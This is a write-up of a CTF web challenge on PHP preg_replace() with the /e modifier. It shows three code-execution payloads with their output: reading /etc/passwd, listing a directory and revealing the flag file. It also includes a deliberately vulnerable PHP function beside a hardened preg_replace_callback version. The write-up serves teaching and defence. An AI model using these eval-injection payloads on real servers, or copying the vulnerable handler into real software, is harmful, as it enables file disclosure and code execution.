Title : [writeups] Internetwache CTF 2016 - Replace with Grace #web60
Released : 2016-02-22 02:33:51 -0500
Viewed : 762

https://ctf.internetwache.org/tasks/web/60

Description: Regular expressions are pretty useful. Especially when you need to search and replace complex terms.

Service: https://replace-with-grace.ctf.internetwache.org/

This challenge is about a regular-expression vulnerability: the page hands a user-supplied pattern and replacement to PHP's preg_replace(), and the /e (PREG_REPLACE_EVAL) modifier makes preg_replace() substitute the back-references into the replacement string and then eval() it as PHP code. The modifier was deprecated in PHP 5.5 and removed in 7.0, so the service is evidently still on PHP 5.x. First I test whether it is exploitable using include():

Pattern	: /^(.*)/e
Replace	: include("\1")
Input	: /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
vnstat:x:108:113::/var/lib/vnstat:/bin/false
mysql:x:109:114:MySQL Server,,,:/nonexistent:/bin/false
web50:x:1000:1000::/home/web50:/bin/false
web60:x:1001:1001::/home/web60:/bin/false
web70:x:1002:1002::/home/web70:/bin/false
web80:x:1003:1003::/home/web80:/bin/false
web90:x:1004:1004::/home/web90:/bin/false
crypto80:x:1005:1005::/home/crypto80:/bin/false
colord:x:110:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:111:119::/var/lib/saned:/bin/false
1

Yarp. It's working. include() dumps the file verbatim because it is not PHP, and the trailing 1 is the return value of include() that preg_replace() substitutes for the match.
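As an added example (not the challenge's own source, which was never published), here is a minimal PHP handler that reproduces the bug beside a hardened version. The function names, the size limits and the `~` delimiter are my own choices; only the payload shape comes from the writeup. The vulnerable half is only exploitable on PHP 5.x, where /e still exists.

```php
<?php
// Added example, not the challenge's own source (which was never published).
// Shows why preg_replace() with a user-controlled /e pattern is code execution,
// and one way to offer user-defined search/replace safely.
// The vulnerable half is only exploitable on PHP 5.x; PHP 7.0 removed
// PREG_REPLACE_EVAL, so there it emits a warning and returns null.

// --- Vulnerable: what the challenge evidently does -------------------------
// Pattern, replacement and subject all come from the request. With /e in the
// pattern, preg_replace() substitutes back-references into the replacement
// and then eval()s it, so 'include("\1")' on subject '/etc/passwd' becomes
// include("/etc/passwd").
function vulnerable_replace($pattern, $replacement, $subject)
{
    return (string) @preg_replace($pattern, $replacement, $subject);
}

// --- Hardened ----------------------------------------------------------------
// 1. The user supplies only the regex body; delimiter and modifiers are fixed
//    here, so no modifier (e or anything else) can be smuggled in.
// 2. preg_replace_callback() expands back-references in our own code; the
//    replacement is plain template text and is never evaluated.
// 3. Fail closed on compile errors and backtracking-limit errors.
function safe_replace(string $regexBody, string $replacement, string $subject): string
{
    $delim = '~';   // assumption: delimiter chosen by the application, not the user
    if ($regexBody === '' || strlen($regexBody) > 200 || strlen($subject) > 10000) {
        throw new InvalidArgumentException('pattern or subject too large');
    }
    // A delimiter inside the body could close the pattern early and turn the
    // rest into modifiers, so refuse it rather than trying to escape it.
    if (strpos($regexBody, $delim) !== false) {
        throw new InvalidArgumentException('delimiter not allowed in pattern');
    }
    $pattern = $delim . $regexBody . $delim . 'u';

    $result = preg_replace_callback(
        $pattern,
        function (array $m) use ($replacement): string {
            // Replace \N and $N (N = 0..9) with the captured text, as a string.
            return preg_replace_callback(
                '/\\\\(\d)|\$(\d)/',
                function (array $ref) use ($m): string {
                    $n = (int) ($ref[1] !== '' ? $ref[1] : $ref[2]);
                    return $m[$n] ?? '';
                },
                $replacement
            );
        },
        $subject
    );
    if ($result === null) {
        throw new RuntimeException('regex failed, preg_last_error=' . preg_last_error());
    }
    return $result;
}

// Constructed input: the writeup's first payload, run through the safe path.
// The back-reference is expanded as text, so nothing is executed and the
// replacement is echoed back literally instead of reading the file.
echo safe_replace('^(.*)', 'include("\1")', '/etc/passwd'), "\n";
```

The important design point is that the user never controls the modifier string: even on a PHP 5.x interpreter, appending `/e` is impossible because the delimiter and modifiers are added server-side and the delimiter character is rejected in the body. preg_replace_callback() is the replacement PHP itself recommends for every former /e use.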

Now let's list the directory. I use glob() because the command-execution functions (exec() and friends) are disabled on the server; glob() is a plain filesystem call, so it is unaffected and returns an array of matching paths.

Pattern	: /^(.*)/e
Replace	: print_r(glob("\1"))
Input	: ./*

Array
(
    [0] => ./ajax.php
    [1] => ./assets
    [2] => ./flag.php
    [3] => ./index.php
)
1

That gives us flag.php. Now let's read it with show_source(), which prints the file syntax-highlighted as HTML and returns true (hence the trailing 1 again).

Pattern	: /^(.*)/e
Replace	: show_source("\1")
Input	: flag.php

<?php

$FLAG = "IW{R3Pl4c3_N0t_S4F3}";
?>
1

Yarp. Got the flag.

Flag: IW{R3Pl4c3_N0t_S4F3}